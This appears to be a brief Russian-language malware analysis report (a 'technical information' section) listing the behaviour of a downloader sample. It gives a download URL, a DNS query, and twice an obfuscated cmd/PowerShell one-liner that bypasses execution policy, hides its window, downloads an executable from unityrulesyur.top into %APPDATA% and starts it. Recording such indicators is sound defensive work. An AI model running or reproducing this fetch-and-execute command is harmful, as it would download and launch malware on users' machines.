Техническая информация
- http://unityrulesyur.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOweRshEll.Exe -exeCuTiOnpOlIcy bYPaSS -noProfILE -WiNdoWStYle HiDDen (nEw-OBJECt sYSTeM.NET.WEbCliENt).dowNloadfile('http://unityrulesyur.top/search.php','%ApPDaTa%.Exe');START-p...
- DNS ASK un####ulesyur.top
- '<SYSTEM32>\cmd.exe' /C "pOweRshEll.Exe -exeCuTiOnpOlIcy bYPaSS -noProfILE -WiNdoWStYle HiDDen (nEw-OBJECt sYSTeM.NET.WEbCliENt).dowNloadfile('http://unityrulesyur.top/search.php','%ApPDaTa%.Exe');START-p...' (со скрытым окном)